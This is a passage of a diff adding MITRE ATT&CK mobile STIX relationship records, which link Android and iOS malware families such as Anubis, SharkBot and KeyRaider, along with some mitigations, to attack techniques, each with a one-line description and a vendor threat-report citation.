"x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--875dc21d-92c3-45bf-be37-faa44f4449bf", + "created": "2020-06-02T14:32:31.891Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Google Project Zero Insomnia", + "description": "I. Beer. (2019, August 29). Implant Teardown. 
Retrieved June 2, 2020.", + "url": "https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T19:51:44.262Z", + "description": "[INSOMNIA](https://attack.mitre.org/software/S0463) can collect the device’s contact list.(Citation: Google Project Zero Insomnia)", + "relationship_type": "uses", + "source_ref": "malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--9814ecd5-911a-4776-9dc0-4a4ae0bf6a39", + "type": "relationship", + "created": "2020-04-08T15:41:19.364Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cofense Anubis", + "url": "https://cofense.com/infostealer-keylogger-ransomware-one-anubis-targets-250-android-applications/", + "description": "M. Feller. (2020, February 5). Infostealer, Keylogger, and Ransomware in One: Anubis Targets More than 250 Android Applications. Retrieved April 8, 2020." 
+ } + ], + "modified": "2020-04-08T15:41:19.364Z", + "description": "[Anubis](https://attack.mitre.org/software/S0422) can take screenshots.(Citation: Cofense Anubis)", + "relationship_type": "uses", + "source_ref": "malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d3e52467-d090-4ebd-b9b1-3022cc6d5df0", + "created": "2023-02-06T19:42:34.537Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "threatfabric_sova_0921", + "description": "ThreatFabric. (2021, September 9). S.O.V.A. - A new Android Banking trojan with fowl intentions. Retrieved February 6, 2023.", + "url": "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-11T22:08:03.095Z", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) can resist removal by going to the home screen during uninstall.(Citation: threatfabric_sova_0921)", + "relationship_type": "uses", + "source_ref": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "target_ref": "attack-pattern--dc01774a-d1c1-45fb-b506-0a5d1d6593d9", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--5a7295a2-ad95-4362-8b2c-9265ad5c73b0", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Lookout-StealthMango", + "url": 
"https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Stealth Mango](https://attack.mitre.org/software/S0328) uses commands received from text messages for C2.(Citation: Lookout-StealthMango)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--085eb36d-697d-4d9a-bac3-96eb879fe73c", + "target_ref": "attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--76cc66f4-ce85-4873-a63e-879b4a14a540", + "created": "2023-03-03T16:23:20.764Z", + "revoked": false, + "external_references": [ + { + "source_name": "paloalto_yispecter_1015", + "description": "Claud Xiao. (2015, October 4). YiSpecter: First iOS Malware That Attacks Non-jailbroken Apple iOS Devices by Abusing Private APIs. 
Retrieved March 3, 2023.", + "url": "https://unit42.paloaltonetworks.com/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-03T16:23:20.764Z", + "description": "[YiSpecter](https://attack.mitre.org/software/S0311) has connected to the C2 server via HTTP.(Citation: paloalto_yispecter_1015)", + "relationship_type": "uses", + "source_ref": "malware--a15c9357-2be0-4836-beec-594f28b9b4a9", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--65acbbe2-48e1-4fba-a781-39fb040a711d", + "type": "relationship", + "created": "2019-09-03T19:45:48.505Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SWB Exodus March 2019", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019." 
+ } + ], + "modified": "2019-09-11T13:25:19.178Z", + "description": " [Exodus](https://attack.mitre.org/software/S0405) One, after checking in, sends a POST request and then downloads [Exodus](https://attack.mitre.org/software/S0405) Two, the second stage binaries.(Citation: SWB Exodus March 2019) ", + "relationship_type": "uses", + "source_ref": "malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f95fec2e-f5cf-49c9-8e0b-1c6c5fd15d8f", + "created": "2019-10-18T14:50:57.494Z", + "x_mitre_version": "1.0", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Security updates often contain patches for vulnerabilities.", + "modified": "2022-04-11T14:26:44.192Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bcecd036-f40e-4916-9f8e-fd0ccf0ece8d", + "target_ref": "attack-pattern--667e5707-3843-4da8-bd34-88b922526f0d", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--05243ccb-0aeb-4db4-bb03-51a65fb715ab", + "created": "2020-09-11T14:54:16.589Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Lookout Desert Scorpion", + "url": "https://blog.lookout.com/desert-scorpion-google-play", + "description": "A. Blaich, M. Flossman. (2018, April 16). Lookout finds new surveillanceware in Google Play with ties to known threat actor targeting the Middle East. Retrieved September 11, 2020." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Desert Scorpion](https://attack.mitre.org/software/S0505) can be controlled using SMS messages.(Citation: Lookout Desert Scorpion)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--3271c107-92c4-442e-9506-e76d62230ee8", + "target_ref": "attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--7b679dbf-4e31-4d0b-9e13-eb8c3b98b7fb", + "created": "2019-08-09T16:19:02.782Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Android Capture Sensor 2019", + "url": "https://developer.android.com/about/versions/pie/android-9.0-changes-all#bg-sensor-access", + "description": "Android Developers. (, January). Android 9+ Privacy Changes . Retrieved August 27, 2019." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Android 9 and above restricts access to microphone, camera, and other sensors from background applications.(Citation: Android Capture Sensor 2019) ", + "modified": "2022-04-01T15:21:13.296Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--24a7379e-a994-411b-b17c-add6c6c6fc07", + "type": "relationship", + "created": "2020-12-24T21:45:56.949Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." 
+ } + ], + "modified": "2020-12-24T21:45:56.949Z", + "description": "[SilkBean](https://attack.mitre.org/software/S0549) has hidden malicious functionality in a second stage file and has encrypted C2 server information.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--ddbe5657-e21e-4a89-8221-2f1362d397ec", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--92129d5b-7822-4e84-8a69-f96b598fba9e", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-StealthMango", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf" + } + ], + "modified": "2019-10-10T15:27:22.175Z", + "description": "[Tangelo](https://attack.mitre.org/software/S0329) accesses databases from WhatsApp, Viber, Skype, and Line.(Citation: Lookout-StealthMango)", + "relationship_type": "uses", + "source_ref": "malware--35aae10a-97c5-471a-9c67-02c231a7a31a", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d70aaf50-29b7-4687-98ea-ffaa3fa858c0", + "type": "relationship", + "created": "2020-12-24T21:55:56.692Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": 
"https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-12-24T21:55:56.692Z", + "description": "[DoubleAgent](https://attack.mitre.org/software/S0550) has searched for specific existing data directories, including the Gmail app, Dropbox app, Pictures, and thumbnails.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--3d6c4389-3489-40a3-beda-c56e650b6f68", + "target_ref": "attack-pattern--cf28ca46-1fd3-46b4-b1f6-ec0b72361848", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--078653a6-3613-4923-ae5a-1bccb8552e67", + "type": "relationship", + "created": "2020-09-11T16:22:03.250Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout ViperRAT", + "url": "https://blog.lookout.com/viperrat-mobile-apt", + "description": "M. Flossman. (2017, February 16). ViperRAT: The mobile APT targeting the Israeli Defense Force that should be on your radar. Retrieved September 11, 2020." 
+ } + ], + "modified": "2020-09-11T16:22:03.250Z", + "description": "[ViperRAT](https://attack.mitre.org/software/S0506) has been installed in two stages and can secretly install new applications.(Citation: Lookout ViperRAT)", + "relationship_type": "uses", + "source_ref": "malware--f666e17c-b290-43b3-8947-b96bd5148fbb", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8f72a070-cfcb-4d75-ace6-b4427f3ba8d3", + "created": "2020-04-08T15:41:19.404Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Cofense Anubis", + "description": "M. Feller. (2020, February 5). Infostealer, Keylogger, and Ransomware in One: Anubis Targets More than 250 Android Applications. Retrieved April 8, 2020.", + "url": "https://cofense.com/infostealer-keylogger-ransomware-one-anubis-targets-250-android-applications/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:18:13.761Z", + "description": "[Anubis](https://attack.mitre.org/software/S0422) can steal the device’s contact list.(Citation: Cofense Anubis) ", + "relationship_type": "uses", + "source_ref": "malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0bb6f851-4302-4936-a98e-d23feecb234d", + "type": "relationship", + "created": "2020-06-02T14:32:31.777Z", + "created_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Volexity Insomnia", + "url": "https://www.volexity.com/blog/2020/04/21/evil-eye-threat-actor-resurfaces-with-ios-exploit-and-updated-implant/", + "description": "A. Case, D. Lassalle, M. Meltzer, S. Koessel, et al.. (2020, April 21). Evil Eye Threat Actor Resurfaces with iOS Exploit and Updated Implant. Retrieved June 2, 2020." + } + ], + "modified": "2020-06-02T14:32:31.777Z", + "description": "[INSOMNIA](https://attack.mitre.org/software/S0463) exploits a WebKit vulnerability to achieve root access on the device.(Citation: Volexity Insomnia)", + "relationship_type": "uses", + "source_ref": "malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--05563777-5771-4bd6-a1af-3e244cf42372", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Xiao-KeyRaider", + "description": "Claud Xiao. (2015, August 30). KeyRaider: iOS Malware Steals Over 225,000 Apple Accounts to Create Free App Utopia. 
Retrieved December 12, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2015/08/keyraider-ios-malware-steals-over-225000-apple-accounts-to-create-free-app-utopia/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "Most [KeyRaider](https://attack.mitre.org/software/S0288) samples search to find the Apple account's username, password and device's GUID in data being transferred.(Citation: Xiao-KeyRaider)", + "relationship_type": "uses", + "source_ref": "malware--3bc1f0ad-ef11-4afc-83c0-fcffe08d4e50", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--3f392718-87c4-483b-b89f-4f0cc056d251", + "type": "relationship", + "created": "2020-07-20T13:58:53.610Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro-XLoader-FakeSpy", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-version-of-xloader-that-disguises-as-android-apps-and-an-ios-profile-holds-new-links-to-fakespy/", + "description": "Hiroaki, H., Wu, L., Wu, L.. (2019, April 2). XLoader Disguises as Android Apps, Has FakeSpy Links. Retrieved July 20, 2020." 
+ } + ], + "modified": "2020-09-24T15:12:24.302Z", + "description": "[XLoader for iOS](https://attack.mitre.org/software/S0490) can obtain the device’s UDID, version number, and product number.(Citation: TrendMicro-XLoader-FakeSpy)", + "relationship_type": "uses", + "source_ref": "malware--29944858-da52-4d3d-b428-f8a6eb8dde6f", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8611661c-04b4-4a82-9669-2d0e26b7b3f3", + "created": "2020-07-15T20:20:59.287Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. 
Retrieved July 15, 2020.", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:53:17.865Z", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) can disable Play Protect.(Citation: Bitdefender Mandrake)", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--2aa78dfd-cb6f-4c70-9408-137cfd96be49", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0f70bdf1-a6a7-406c-a4c0-cee509ff8369", + "created": "2023-02-02T17:46:27.077Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "nccgroup_sharkbot_0322", + "description": "RIFT: Research and Intelligence Fusion Team. (2022, March 3). SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store. Retrieved January 18, 2023.", + "url": "https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:43:17.131Z", + "description": "[SharkBot](https://attack.mitre.org/software/S1055) can exfiltrate captured user credentials and event logs back to the C2 server. 
(Citation: nccgroup_sharkbot_0322)", + "relationship_type": "uses", + "source_ref": "malware--9cd72f5c-bec0-4f7e-bb6d-296937116291", + "target_ref": "attack-pattern--32063d7f-0a39-440d-a4a3-2694488f96cc", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8c9dbc53-27d2-420c-b698-98c23a7ead2b", + "created": "2020-09-11T14:54:16.638Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Desert Scorpion", + "description": "A. Blaich, M. Flossman. (2018, April 16). Lookout finds new surveillanceware in Google Play with ties to known threat actor targeting the Middle East. Retrieved September 11, 2020.", + "url": "https://blog.lookout.com/desert-scorpion-google-play" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:36:55.810Z", + "description": "[Desert Scorpion](https://attack.mitre.org/software/S0505) can delete copies of itself if additional APKs are downloaded to external storage.(Citation: Lookout Desert Scorpion)", + "relationship_type": "uses", + "source_ref": "malware--3271c107-92c4-442e-9506-e76d62230ee8", + "target_ref": "attack-pattern--ab7400b7-3476-4776-9545-ef3fa373de63", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--fa5f3aea-2131-4690-8833-dc428fae2b22", + "created": "2023-01-18T21:38:34.350Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "nccgroup_sharkbot_0322", + "description": "RIFT: Research and Intelligence Fusion 
Team. (2022, March 3). SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store. Retrieved January 18, 2023.", + "url": "https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:57:53.504Z", + "description": "[SharkBot](https://attack.mitre.org/software/S1055) can intercept notifications to send to the C2 server and take advantage of the Direct Reply feature.(Citation: nccgroup_sharkbot_0322)", + "relationship_type": "uses", + "source_ref": "malware--9cd72f5c-bec0-4f7e-bb6d-296937116291", + "target_ref": "attack-pattern--39dd7871-f59b-495f-a9a5-3cb8cc50c9b2", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d64c4924-76f0-4b2e-858d-b0df733334d0", + "created": "2023-02-06T19:03:11.265Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. 
Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:23:09.430Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) can modify system settings to give itself device administrator privileges.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--9c049d7b-c92a-4733-9381-27e2bd2ccadc", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7b1477bc-8fd0-45ce-8eaa-b3b307f18024", + "created": "2022-04-15T18:11:06.097Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Skycure-Profiles", + "description": "Yair Amit. (2013, March 12). Malicious Profiles - The Sleeping Giant of iOS Security. 
Retrieved December 22, 2016.", + "url": "https://www.skycure.com/blog/malicious-profiles-the-sleeping-giant-of-ios-security/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:28:11.000Z", + "description": "Most [KeyRaider](https://attack.mitre.org/software/S0288) samples hook SSLRead and SSLWrite functions in the itunesstored process to intercept device communication with the Apple App Store.(Citation: Skycure-Profiles)", + "relationship_type": "uses", + "source_ref": "malware--3bc1f0ad-ef11-4afc-83c0-fcffe08d4e50", + "target_ref": "attack-pattern--08e22979-d320-48ed-8711-e7bf94aabb13", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--27247071-356b-4b5f-bc8f-6436a3fec095", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-EnterpriseApps", + "description": "Lookout. (2016, May 25). 5 active mobile threats spoofing enterprise apps. 
Retrieved December 19, 2016.", + "url": "https://blog.lookout.com/blog/2016/05/25/spoofed-apps/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[PJApps](https://attack.mitre.org/software/S0291) has the capability to collect and leak the victim's location.(Citation: Lookout-EnterpriseApps)", + "relationship_type": "uses", + "source_ref": "malware--c709da93-20c3-4d17-ab68-48cba76b2137", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ed48a86f-e55f-4abf-8f18-98591b756399", + "created": "2023-03-03T16:19:30.443Z", + "revoked": false, + "external_references": [ + { + "source_name": "paloalto_yispecter_1015", + "description": "Claud Xiao. (2015, October 4). YiSpecter: First iOS Malware That Attacks Non-jailbroken Apple iOS Devices by Abusing Private APIs. Retrieved March 3, 2023.", + "url": "https://unit42.paloaltonetworks.com/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-03T16:19:30.443Z", + "description": "[YiSpecter](https://attack.mitre.org/software/S0311) has hidden the app icon from iOS springboard.(Citation: paloalto_yispecter_1015)", + "relationship_type": "uses", + "source_ref": "malware--a15c9357-2be0-4836-beec-594f28b9b4a9", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": 
